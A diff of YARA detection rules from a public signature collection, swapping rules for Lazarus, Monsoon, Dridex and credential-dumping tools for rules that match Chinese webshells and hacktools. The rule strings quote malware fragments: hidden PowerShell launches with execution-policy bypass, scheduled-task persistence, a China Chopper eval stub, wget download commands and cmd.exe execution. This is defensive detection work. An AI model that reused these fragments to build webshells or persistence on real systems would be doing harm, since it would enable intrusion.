 
 	strings:
-		$s1 = "var _0xf5ed=[\"\\x57\\x53\\x63\\x72\\x69\\x70\\x74\\x2E\\x53\\x68\\x65\\x6C\\x6C\"," ascii
+		$s0 = "<a href=\"users_create.php\">Create User</a>" fullword ascii
+		$s7 = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
+		$s11 = "&nbsp;<b>Default DB</b>&nbsp;" fullword ascii
 
 	condition:
-		filesize < 9KB and 1 of them
+		filesize < 12KB and all of them
 }
-rule SIGNATURE_BASE_Lazarus_Dec_17_5 : FILE
+rule SIGNATURE_BASE_Trigger_Modify : FILE
 {
 	meta:
-		description = "Detects Lazarus malware from incident in Dec 2017"
+		description = "Chinese Hacktool Set - file trigger_modify.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "33bd8c08-123e-5a8e-b5dc-02af7291addc"
-		date = "2017-12-20"
+		id = "a7d65a9f-82de-554c-8f20-7560d2160041"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/8U6fY2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_dec17.yar#L69-L89"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L86-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "480ec19f7050d34713ed621ae9ec5d5463b1cc4710b473465cc78e533796d2e4"
+		hash = "c93cd7a6c3f962381e9bf2b511db9b1639a22de0"
+		logic_hash = "6ea0221af9e9a29d3280a01eec69e31e79c358e664d286f8c80259f5e826876c"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "db8163d054a35522d0dec35743cfd2c9872e0eb446467b573a79f84d61761471"
 
 	strings:
-		$x1 = "$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList" fullword ascii
-		$x2 = "$respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData;" fullword ascii
-		$x3 = "[String]$PS_PATH = \"C:\\\\Users\\\\Public\\\\Documents\\\\ProxyAutoUpdate.ps1\";" fullword ascii
-		$x4 = "$cmdSchedule = 'schtasks /create /tn \"ProxyServerUpdater\"" ascii
-		$x5 = "/tr \"powershell.exe -ep bypass -windowstyle hidden -file " ascii
-		$x6 = "C:\\\\Users\\\\Public\\\\Documents\\\\tmp' + -join " ascii
-		$x7 = "$cmdResult = cmd.exe /c $cmdInst | Out-String;" fullword ascii
-		$x8 = "whoami /groups | findstr /c:\"S-1-5-32-544\"" fullword ascii
+		$s1 = "<form name=\"form1\" method=\"post\" action=\"trigger_modify.php?trigger=<?php e" ascii
+		$s2 = "$data_query = @mssql_query('sp_helptext \\'' . urldecode($_GET['trigger']) . '" ascii
+		$s3 = "if($_POST['query'] != '')" fullword ascii
+		$s4 = "$lines[] = 'I am unable to read this trigger.';" fullword ascii
+		$s5 = "<b>Modify Trigger</b>" fullword ascii
 
 	condition:
-		filesize < 500KB and 1 of them
+		filesize < 15KB and all of them
 }
-rule SIGNATURE_BASE_APT_NK_Methodology_Artificial_Useragent_IE_Win7 : FILE
+rule SIGNATURE_BASE_Customize : FILE
 {
 	meta:
-		description = "Detects hard-coded User-Agent string that has been present in several APT37 malware families."
-		author = "Steve Miller aka @stvemillertime"
-		id = "a747c908-7af7-5c29-8386-a71db7648061"
-		date = "2019-04-06"
+		description = "Chinese Hacktool Set - file Customize.aspx"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a69e1234-cc85-5295-a45c-693afdfc368e"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt37.yar#L1-L17"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L105-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "43119b83a7eaf3dade9477d342b5656970940e9b4f41b3ba5f720d7fbe927762"
-		score = 45
+		hash = "db556879dff9a0101a7a26260a5d0dc471242af2"
+		logic_hash = "f4e0a7342a01411ae060c9d995072518f2e3299af1b0d396bb319eeec42c1519"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e63efbf8624a531bb435b7446dbbfc25"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
-		$a2 = {4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 20 57 4f 57 36 34 3b 20 54 72 69 64 65 6e 74 2f 37 2e 30 3b 20 72 76 3a 31 31 2e 30 29 20 6c 69 6b 65 20 47 65 63 6b 6f 00 00 00 00}
-		$fp1 = "Esumsoft" wide
-		$fp2 = "Acunetix" wide ascii
-		$fp3 = "TASER SYNC" ascii
+		$s1 = "ds.Clear();ds.Dispose();}else{SqlCommand cm = Conn.CreateCommand();cm.CommandTex" ascii
+		$s2 = "c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=tr" ascii
+		$s3 = "Stream WF=WB.GetResponseStream();FileStream FS=new FileStream(Z2,FileMode.Create" ascii
+		$s4 = "R=\"Result\\t|\\t\\r\\nExecute Successfully!\\t|\\t\\r\\n\";}Conn.Close();break;" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* ) and not 1 of ( $fp* )
+		filesize < 24KB and all of them
 }
-rule SIGNATURE_BASE_EXPL_Exploit_TLB_Scripts : FILE
+rule SIGNATURE_BASE_Oracle_Data
 {
 	meta:
-		description = "Detects malicious TLB files which may be delivered via Visual Studio projects"
-		author = "Rich Warren (slightly modified by Florian Roth)"
-		id = "5151458e-4c30-50ff-a39e-e5b5b68b87aa"
-		date = "2021-01-26"
+		description = "Chinese Hacktool Set - file oracle_data.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "faa62dcc-0f59-573c-8722-d07216de151f"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/outflanknl/Presentations/blob/master/Nullcon2020_COM-promise_-_Attacking_Windows_development_environments.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_tlb_scripts.yar#L2-L19"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L123-L138"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "39bf626d60a867d054762043f74e86998d6848439655f84be72003c112db9953"
+		hash = "6cf070017be117eace4752650ba6cf96d67d2106"
+		logic_hash = "1ab9b6c4349dd891103a24a77c93c2abb784d3ed616523f3aaec68b05082983e"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = ".sct" ascii nocase
-		$b = "script:" ascii nocase
-		$c = "scriptlet:" ascii nocase
-		$d = "soap:" ascii nocase
-		$e = "winmgmts:" ascii nocase
+		$s0 = "$txt=fopen(\"oracle_info.txt\",\"w\");" fullword ascii
+		$s1 = "if(isset($_REQUEST['id']))" fullword ascii
+		$s2 = "$id=$_REQUEST['id'];" fullword ascii
 
 	condition:
-		uint32be( 0 ) == 0x4D534654 and filesize < 100KB and any of them
+		all of them
 }
-
-rule SIGNATURE_BASE_Monsoon_APT_Malware_1 : FILE
+rule SIGNATURE_BASE_Reduhservers_Reduh : FILE
 {
 	meta:
-		description = "Detects malware from Monsoon APT"
+		description = "Chinese Hacktool Set - file reDuh.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a543c46d-01fc-5276-a915-183263956455"
-		date = "2017-09-08"
-		modified = "2023-01-06"
-		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_monsoon.yar#L14-L35"
+		id = "c87d971a-a16f-5593-88fb-6bcd207e0841"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L140-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "76580f999d445f4baace5287a3038e294f8be3783289d6c7c5b2c0c92c39db86"
+		hash = "377886490a86290de53d696864e41d6a547223b0"
+		logic_hash = "dcb1515da696566d01ec64029a34438a56d2df480b9cd2ea586f71ffe3324c1a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c9642f44d33e4c990066ce6fa0b0956ff5ace6534b64160004df31b9b690c9cd"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "cmd.exe /c start " fullword ascii
-		$s2 = "\\Microsoft\\Templates\\" ascii
-		$s3 = "\\Microsoft\\Windows\\" ascii
+		$s1 = "out.println(\"[Error]Unable to connect to reDuh.jsp main process on port \" +ser" ascii
+		$s4 = "System.out.println(\"IPC service failed to bind to \" + servicePort);" fullword ascii
+		$s17 = "System.out.println(\"Bound on \" + servicePort);" fullword ascii
+		$s5 = "outputFromSockets.add(\"[data]\"+target+\":\"+port+\":\"+sockNum+\":\"+new Strin" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "a0c824244f1d36ea1dd2759cf7599cd1" or all of them ) )
+		filesize < 116KB and all of them
 }
-rule SIGNATURE_BASE_Monsoon_APT_Malware_2 : FILE
+rule SIGNATURE_BASE_Item_Old : FILE
 {
 	meta:
-		description = "Detects malware from Monsoon APT"
+		description = "Chinese Hacktool Set - file item-old.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dbbccf56-7e36-5c3a-b8d9-ee08d077f29f"
-		date = "2017-09-08"
+		id = "c32bbd48-a363-53c7-84c6-c47581e2f9da"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_monsoon.yar#L37-L64"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L157-L172"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "20552573102dd981c81ffa6a8c7bbdfafc9bbb7da1fbc12f273bca7d6a0c9d05"
+		hash = "daae358bde97e534bc7f2b0134775b47ef57e1da"
+		logic_hash = "181e46408050490dccc4f321bd1072da0436d920e16cc4711b16425eb5bd73ed"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "17c3d0fe08e1184c9737144fa065f4530def30d6591e5414a36463609f9aa53a"
-		hash2 = "8e0574ebf3dc640ac82987ab6ee2a02fc3dd5eaf4f6b5275272ba887acd15ac0"
-		hash3 = "bf93ca5f497fc7f38533d37fd4c083523ececc34aa2d3660d81014c0d9091ae3"
 
 	strings:
-		$x1 = "\\Microsoft\\Windows\\coco.exe" ascii
-		$x2 = ":\\System Volume Information\\config" fullword ascii
-		$x3 = " cscript.[BACKSPA[PAGE DO[CAPS LO[PAGE UPTPX498.dTPX499.d" fullword wide
-		$s1 = "\\Microsoft\\Templates\\msvcrt.dll" ascii
-		$s2 = "%04d/%02d/%02d %02d:%02d:%02d - {%s}" fullword wide
-		$s3 = "wininet.dll    " fullword ascii
-		$s4 = "DMCZ0001.dat" fullword ascii
-		$s5 = "TZ0000001.dat" fullword ascii
-		$s6 = "\\MUT.dat" ascii
-		$s7 = "ouemm/emm!!!!!!!!!!!!!" fullword ascii
+		$s1 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
+		$s2 = "$sCmd = \"convert \".$sFile.\" -flip -quality 80 \".$sFileOut;" fullword ascii
+		$s3 = "$sHash = md5($sURL);" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of them ) )
+		filesize < 7KB and 2 of them
 }
-
-rule SIGNATURE_BASE_Crime_Win32_Dridex_Socks5_Mod
+rule SIGNATURE_BASE_Tools_2014 : FILE
 {
 	meta:
-		description = "Detects Dridex socks5 module"
-		author = "@VK_Intel"
-		id = "cee256b1-ad80-55dd-bbd3-0d3f7bc49664"
-		date = "2020-04-06"
+		description = "Chinese Hacktool Set - file 2014.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bb76321b-003d-5f6b-a84b-425477abe91c"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_evilcorp_dridex_banker.yar#L8-L20"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L174-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5ca09e9c7d94e949e453d1bb69b566c12b253579cbcae700929d4f517df35a0a"
+		hash = "74518faf08637c53095697071db09d34dbe8d676"
+		logic_hash = "caa365cc1a641b7dcd5d2082240d981e66caf6da1379ee109a0bb1f651d1f00f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "socks5_2_x32.dll"
-		$s1 = "socks5_2_x64.dll"
+		$s0 = "((Invoker) ins.get(\"login\")).invoke(request, response," fullword ascii
+		$s4 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
+		$s5 = ": \"c:\\\\windows\\\\system32\\\\cmd.exe\")" fullword ascii
 
 	condition:
-		any of ( $s* ) and pe.exports ( "start" )
+		filesize < 715KB and all of them
 }
-
-rule SIGNATURE_BASE_Crime_Win32_Hvnc_Banker_Gen
+rule SIGNATURE_BASE_Reduhservers_Reduh_2 : FILE
 {
 	meta:
-		description = "Detects malware banker hidden VNC"
-		author = "@VK_Intel"
-		id = "5e13f4a9-2231-524f-82b2-fbc6d6a43b6f"
-		date = "2020-04-06"
+		description = "Chinese Hacktool Set - file reDuh.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6050dfde-6c79-5dd8-a772-508668177aa5"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1247058432223477760"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_evilcorp_dridex_banker.yar#L22-L31"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L191-L206"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b01af685c3826834aadaf4eac1f1d8171db288a2efa7b769d8122421f7af8d7e"
+		hash = "512d0a3e7bb7056338ad0167f485a8a6fa1532a3"
+		logic_hash = "954115da374b6d72c35244673799be6e8bae5288f53509dea04e3ae3c489af12"
 		score = 75
 		quality = 85
-		tags = ""
-
-	condition:
-		pe.exports( "VncStartServer" ) and pe.exports ( "VncStopServer" )
-}
-rule SIGNATURE_BASE_Windowscredentialeditor
-{
-	meta:
-		description = "Windows Credential Editor"
-		author = "Florian Roth"
-		id = "1542c6e4-36b2-5272-85d0-43226869b43e"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L20-L31"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "531a0bdc893d89b1c14deee11df95b430051cef07744a15b5d606e1c5378db97"
-		score = 90
-		quality = 85
-		tags = ""
-		threat_level = 10
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "extract the TGT session key"
-		$b = "Windows Credentials Editor"
+		$s1 = "errorlog(\"FRONTEND: send_command '\".$data.\"' on port \".$port.\" returned \"." ascii
+		$s2 = "$msg = \"newData:\".$socketNumber.\":\".$targetHost.\":\".$targetPort.\":\".$seq" ascii
+		$s3 = "errorlog(\"BACKEND: *** Socket key is \".$sockkey);" fullword ascii
 
 	condition:
-		all of them
+		filesize < 57KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Amplia_Security_Tool : FILE
+rule SIGNATURE_BASE_Customize_2 : FILE
 {
 	meta:
-		description = "Detects Amplia Security Tool like Windows Credential Editor"
-		author = "Florian Roth"
-		id = "4ad83f34-561d-53ce-9766-e21700354da7"
-		date = "2013-01-01"
-		modified = "2023-02-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L33-L53"
+		description = "Chinese Hacktool Set - file Customize.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1f7e9063-33d8-5df4-89d5-7d8fc1be61f0"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L208-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7ca32d8df0011f23922c6566b28aa55b0756d5b67bf3db8908b206b1038bb1f2"
-		score = 60
+		hash = "37cd17543e14109d3785093e150652032a85d734"
+		logic_hash = "aa0940a21eea6ba50a93dd36a8f914f636fdba0685048fc67e16dd68c1c2794e"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		nodeepdive = 1
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "Amplia Security"
-		$c = "getlsasrvaddr.exe"
-		$d = "Cannot get PID of LSASS.EXE"
-		$e = "extract the TGT session key"
-		$f = "PPWDUMP_DATA"
+		$s1 = "while((l=br.readLine())!=null){sb.append(l+\"\\r\\n\");}}" fullword ascii
+		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of them ) or 3 of them
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_Pwdump
+rule SIGNATURE_BASE_Chinachopper_One : FILE
 {
 	meta:
-		description = "PwDump 6 variant"
-		author = "Marc Stroebel"
-		id = "e557e548-53e8-5098-93d4-8e899384e67c"
-		date = "2014-04-24"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L56-L69"
+		description = "Chinese Hacktool Set - file one.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "854fb5c9-38c7-5fd2-a473-66ae297070f5"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L224-L237"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a998d16f84e8689f182f6665ad165c6ff19e25d3e52acc10ca4cc6fe54ba354f"
-		score = 70
+		hash = "6cd28163be831a58223820e7abe43d5eacb14109"
+		logic_hash = "f9a6e4b8556eb3f1e1cbe0bc4eb225b9564ac59aae4a97f184806c6bec95578d"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
-		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
-		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+		$s0 = "<%eval request(" ascii
 
 	condition:
-		1 of them
+		filesize < 50 and all of them
 }
-rule SIGNATURE_BASE_Pscan_Portscan_1
+rule SIGNATURE_BASE_CN_Tools_Old : FILE
 {
 	meta:
-		description = "PScan - Port Scanner"
-		author = "F. Roth"
-		id = "54997776-644b-5a72-b08c-7174b7dc7f66"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L71-L83"
+		description = "Chinese Hacktool Set - file old.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bfdb84e8-e5a8-53a4-ae71-e0d1b38d38ef"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L239-L255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c624fcdf28506b551bf7b36883d95b279a7c56322337a0acafd91205659c92cc"
-		score = 50
+		hash = "f8a007758fda8aa1c0af3c43f3d7e3186a9ff307"
+		logic_hash = "3f0ac357e9a9fb4ee937b53145b33ba1041310d979cbc3feb0a4caf026b9b730"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "00050;0F0M0X0a0v0}0"
-		$b = "vwgvwgvP76"
-		$c = "Pr0PhOFyP"
+		$s0 = "$sCmd = \"wget -qc \".escapeshellarg($sURL).\" -O \".$sFile;" fullword ascii
+		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sFile;" fullword ascii
+		$s2 = "chmod(\"/\".substr($sHash, 0, 2), 0777);" fullword ascii
+		$s3 = "$sCmd = \"echo 123> \".$sFileOut;" fullword ascii
 
 	condition:
-		all of them
+		filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_Hacktool_Samples
+rule SIGNATURE_BASE_Item_301 : FILE
 {
 	meta:
-		description = "Hacktool"
-		author = "Florian Roth"
-		id = "ecacf84a-f66c-5c21-ae4b-fd9bfb5be384"
-		date = "2016-02-15"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L85-L119"
+		description = "Chinese Hacktool Set - file item-301.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ee9a089-313f-53c1-8196-1348d721dbf4"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L257-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0064950d88eccbe670cd1dc70861d093c7f49f8f10e984aef4cfb4bcc94e4645"
-		score = 50
-		quality = 83
-		tags = ""
+		hash = "15636f0e7dc062437608c1f22b1d39fa15ab2136"
+		logic_hash = "623e235ff3eb0922fe8aee732144a15bcc0c580229654ae988353176f488b085"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = "Unable to uninstall the fgexec service"
-		$b = "Unable to set socket to sniff"
-		$c = "Failed to load SAM functions"
-		$d = "Dump system passwords"
-		$e = "Error opening sam hive or not valid file"
-		$f = "Couldn't find LSASS pid"
-		$g = "samdump.dll"
-		$h = "WPEPRO SEND PACKET"
-		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
-		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
-		$k = "arpspoof\\Debug"
-		$l = "Success: The log has been cleared"
-		$m = "clearlogs [\\\\computername"
-		$n = "DumpUsers 1."
-		$o = "dictionary attack with specified dictionary file"
-		$p = "by Objectif Securite"
-		$q = "objectif-securite"
-		$r = "Cannot query LSA Secret on remote host"
-		$s = "Cannot write to process memory on remote host"
-		$t = "Cannot start PWDumpX service on host"
-		$u = "usage: %s <system hive> <security hive>"
-		$v = "username:domainname:LMhash:NThash"
-		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
-		$x = "Impersonation Tokens Available"
-		$y = "failed to parse pwdump format string"
-		$z = "Dumping password"
+		$s1 = "$sURL = \"301:http://\".$sServer.\"/index.asp\";" fullword ascii
+		$s2 = "(gov)\\\\.(cn)$/i\", $aURL[\"host\"])" ascii
+		$s3 = "$aArg = explode(\" \", $sContent, 5);" fullword ascii
+		$s4 = "$sURL = $aArg[0];" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 3KB and 3 of them
 }
-rule SIGNATURE_BASE_Fierce2
+rule SIGNATURE_BASE_CN_Tools_Item : FILE
 {
 	meta:
-		description = "This signature detects the Fierce2 domain scanner"
+		description = "Chinese Hacktool Set - file item.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08a72151-48c2-513b-995f-be0d5acba7dd"
-		date = "2014-01-07"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L123-L135"
+		id = "954f24c9-d7d5-56d3-86f0-0cf8832640dd"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L275-L291"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05502827dd5d1903507fd1e176d518516a5c1965fb4e51ea26b1a05eb0dce3d2"
-		score = 60
+		hash = "a584db17ad93f88e56fd14090fae388558be08e4"
+		logic_hash = "1e927fd093aa11ad525f3f64d657f314520669b4237eac8f87d0be53cd848044"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+		$s1 = "$sURL = \"http://\".$sServer.\"/\".$sWget;" fullword ascii
+		$s2 = "$sURL = \"301:http://\".$sServer.\"/\".$sWget;" fullword ascii
+		$s3 = "$sWget=\"index.asp\";" fullword ascii
+		$s4 = "$aURL += array(\"scheme\" => \"\", \"host\" => \"\", \"path\" => \"\");" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_Ncrack
+rule SIGNATURE_BASE_F3_Diy : FILE
 {
 	meta:
-		description = "This signature detects the Ncrack brute force tool"
+		description = "Chinese Hacktool Set - file diy.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c1c56ee9-7f76-5440-b0e0-86e372c53340"
-		date = "2014-01-07"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L137-L149"
+		id = "9f36c6dd-89e8-511b-a499-131f1e8a420a"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_webshells.yar#L293-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
